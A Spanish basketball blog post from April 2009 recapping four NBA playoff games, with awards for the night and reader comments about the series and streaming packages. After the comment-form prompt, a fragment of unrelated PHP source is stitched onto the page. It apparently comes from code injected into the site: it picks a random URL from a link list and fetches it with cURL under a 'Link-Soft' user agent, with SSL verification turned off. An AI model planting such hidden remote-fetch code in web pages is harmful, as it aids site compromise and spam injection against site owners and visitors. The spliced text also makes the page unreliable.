Playoffs (19/04/2009): 3 rutinas y 1 campanada

20 de April de 2009 por MagicJohnson32

iguobuzzerPor MagicJohnson32 & TheDeerHunter

Así son los Playoffs. Así es el Este. Los Magic se han pasado 82 partidos de regular season silenciando a los que dudaban de su condición de candidatos. Pero llega el primer partido de su serie contra los Sixers, que venían de perder 6 de sus últimos 7 partidos, y no sólo ceden la ventaja de campo sino que lo hacen echando por la borda una renta de 18 puntos a 13 minutos para el final. El partido fue de lo más atípico: los Magic, el equipo más triplista de la NBA, sólo acertó con 5 de sus 18 lanzamientos de 3; Donyell Marshall fue uno de los héroes de la noche, con tres triples en el último cuarto (uno de ellos para empatar el partido a medio minuto para el final); y, sobre todo, el highlight del encuentro lo aportó Anthony Johnson con un mate sobre Ratliff (sí, fue tal y como lo contamos). La cuestión es que Howard y Courtney Lee se pusieron las botas pero Stan Van Gundy estuvo lento de reflejos para devolver a los titulares a pista cuando los Sixers remontaban, y al final un canastón de Iguodala dio el triunfo por 100-98 a los de Philadelphia, que ahora esperan no repetir la experiencia del año pasado cuando ganaron su primer partido en Detroit para acabar cayendo ante los Pistons por 4-2.

cpbscottÉsta fue la única sorpresa de la jornada. Los otros tres partidos supusieron amplias victorias locales y la continuación de las tendencias mostradas en regular season. Los Hawks desactivaron a Dwyane Wade como sólo ellos parecen saber hacer y aplastaron a los Heat 64-90. El tanteo de los de Florida resume bien la imagen que ofrecieron, especialmente en un último cuarto en el que sólo anotaron 7 puntos y en el que se pasaron casi ocho minutos sin anotar. Wade, que cometió 8 pérdidas, fue el único de su equipo en anotar másde 10 puntos, mientras que Josh Smith fue el mejor del partido con 23 puntos, 10 rebotes y 3 robos.

También se llevaron una buena tunda los Hornets, que cayeron en el Pepsi Center 84-113. Chis Paul hizo sus números -21 puntos, 11 asistencias, 5 rebotes, 2 robos- pero Billups estuvo inmenso y se fue hasta los 36 puntos con una exhibición desde la línea de 3 (8 de 9) y 8 asistencias sin pérdidas. Ni West ni Stojakovic ni Posey ni Chandler… ningún otro hornet al margen de CP3 anotó más de 13 puntos y de ahí el 37.2% de acierto en tiros de campo de los de Byron Scott. Los Nuggets, en cambio, no necesitaron apenas a Carmelo, que se quedó en 13 puntos y pudo reservarse para mejores ocasiones.

kobedunkjazzLa jornada del domingo se abrió con otro cómodo triunfo local. Previsible. Poco más que un trámite. Los Jazz han ganado en toda la temporada un solo partido en canchas de equipos con balance positivo. Y por lo visto anoche, difícil será que mejoren este registro. Los angelinos no dejaron lugar a especulaciones y no sufrieron en ningún momento. Gasol pasó por el partido como una brisa, discreto pero con 20 puntos, 9 rebotes y 4 tapones en su haber. Bryant leyó bien el encuentro de inicio, cuando Sloan mandó dobles y triples marcas sobre él. Ariza y Shannon Brown fueron los grandes beneficiados: entre ambos, 6 de 7 en triples. El caso de Brown, que ha borrado a Farmar del mapa, es curioso: llegó como relleno en el traspaso de Radmanovic y Morrison, y poco a poco se ha hecho hueco en la rotación gracias a su estilo agresivo, piernas rápidas y su capacidad de trabajo. Los Lakers apenas sudaron y ofrecieron una gran sensación de superioridad, mientras que los Jazz siguen sin descifrar las claves de su paupérrimo rendimiento lejos de Salt Lake City. De nada valió la mejor marca en asistencias de Deron Williams en los Playoffs (17) ni las funcionariales estadísticas de Boozer y Millsap (42 puntos y 17 rebotes entre ambos).

PREMIOS

MVP: Iguodala estuvo decisivo en la remontada de los Sixers en Orlando y su última canasta es indescriptible… pero el MVP de la 2ª jornada de Playoffs no puede ser para otro sino Chauncey Billups. En su duelo contra Chris Paul decidió pasar a la ofensiva y Paul conoció el miedo. 8 de 9 en triples, dirección magistral. La experiencia es un grado y la inteligencia otro, pero “el mariscal” no anda tampoco manco de talento.

dmarshallEl Rookie: La noche fue difícil para los rookies de Miami. Beasley logró un doble doble que más que otra cosa le evocará pesadillas.

La sorpresa: Ya resulta curiosa en muchas ocasiones la vida de un jugador NBA. Todos conocemos a Donyell Marshall y lo que ha sido. Este año apenas ha contado, pero llega el primer partido de Playoffs y resulta decisivo anotando 11 putos en 11 minutos incluido el triplazo para empatar en Orlando. Un dato más: +18 para los Sixers con él en el campo, durante esos escasos 11 minutos. Alucinante.

La Decepción: Volvió Turkoglu para este primer partido pero ya se hubiera podido quedar descansando en casa. Pero para decepción, la actuación de Jermaine O’Neal en Atlanta, que no se corresponde para nada a un jugador de la experiencia y categoría que se le presuponía al “Otro”.

El mayor esfuerzo en vano: Supermán Howard firmó una de sus más completas actuaciones en Playoffs en la cara de un rival defensivamente muy válido como es Dalembert. De nada le sirvió y no pudo evitar la remontada de los Sixers.

Comenta

10 comentarios a esta entrada

  1. Txusma dice:
    #1

    Se reafirma el favoritismo de Cavs y Lakers para llegar a la final pq ninguno de los 2 ha sudado mucho para doblegar a 2 equipos muy molestos, a pesar de haber acabado octavos sus temporadas.
    La derrota de los Magic si que es de traca, casi al nivel de la de Boston…

      Citar

  2. Jabho dice:
    #2

    Si, los Lakers muy fácil. Apenas se vieron en algún momento puntual con los Jazz a 10 de diferencia… COmo no cambien mucho la cosa en Sant Lake City o ellos mismos se relajen parece que no habrá eliminatoria.

    Vi un rato de los Magic- Philly y cuando los de Orlando no anotan de 3 sufren mucho. Demasiado.

      Citar

  3. El blog de la ÑBA dice:
    #3

    Ayer Orlando sí que echó de menos a Jameer Nelson…

      Citar

  4. couxe dice:
    #4

    Joer… Si antes digo que Paul se comería vivo a Billups… Menudo partidazo el de Chauncey…

      Citar

  5. Fran Reyes dice:
    #5

    Realmente hay una diferencia terrible entre New Orleans y Denver, y para verla sólo hay que fijarse en el número de rebotes conseguidos por los interiores titulares: 14+7+4 para Nené, Melo y Martin; 5+6+2 para Chandler, West y Stojakovic. Si no se palia eso, por superiores que sean por fuera (que dudo que lo sean) Paul y Butler con respecto a Billups y el ‘ex osito’ Jones, será imposible que Hornets superen a Nuggets.

    Respecto a Shannon Brown… la verdad es que cuando vi el trade lo que menos me esperaba era que él se convirtiera en un recurso usual de Phil Jackson, por muy flojo que estuviera Farmar. El dato que más llama la atención: 66% en triples desde que llegó a los Lakers. Tremendo, como el +20 a favor de los angelinos en los 21 minutos que anduvo en pista.

      Citar

  6. Viva_Dirk dice:
    #6

    Demasiado facil lo de Atlanta, desde luego si pueden frenar a Wade de esa manera ganan 4-0.

    Sorpresa de los Sixers, aunque con Thaddeus 100% recuperado y Turkoglu a este nivel no es tanta sorpresa.

      Citar

  7. dunc dice:
    #7

    Buenas Tardes!
    Espectaculares playoffs por ahora, si señor, que alegrón me he llevado con la clasecita de Billups a Paul (no he visto el partido, ¿ha dado la impresión de que le pasaba por encima?). Por otro lado, y mas que el aspecto reboteador (que también), la profundidad de la plantilla de Denver con respecto a la de NO me parece que va a ser un factor decisivo en la eliminatoria.
    Por cierto, una consulta un poco off – topic, ¿veis los partidos por Broadband TV de nba.com? ¿funciona bien en cuanto a calidad de imagen, cortes, etc? ¿cuantos partidos semanales dan? ¿el precio está bien? Para esta temporada no me da tiempo, pero para la siguiente me lo estoy pensando seriamente.

    Gracias y seguid asi, gran blog!

      Citar

  8. kantonyo dice:
    #8

    Yo los veo por International League Pass (ILP), que es un servicio de television streaming de NBA, y que luego ademas los puedes ver repetidos. He pagado aprox 15 al mes, y los playoffs me los han dejado la mismo precio, pero segun veo si solo quieres los playoffs tienes estos precios:

    PREMIUM PLAYOFFS PACKAGE
    HIGH DEFINITION QUALITY
    (watch HD demo channel)
    16×9 WIDE SCREEN

    31,81 €*

    PLAYOFFS PACKAGE
    STANDARD DEFINITION QUALITY
    4×3 SCREEN RATIO

    23,85 €*

      Citar

  9. MagicJohnson32 dice:
    #9

    @ Fran Reyes…

    Pues me voy a poner una medallita. Cuando se hizo el traspaso dije esto: “Ya os digo ahora que me parece que Brown jugará más que Morrison, al menos al principio. Es buen defensor, un jugador agresivo y puede echar una mano como rotación de perímetro, sobre todo para liberar a Bryant de marcar al mejor jugador rival en determinados momentos.”

    A Phil le gusta este tipo de jugador y encaja bien en la plantilla.

      Citar

  10. aro_pasado_no_newtoniano dice:
    #10

    Aún le pasa poco a un equipo que tiene nombre de tomate frito.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>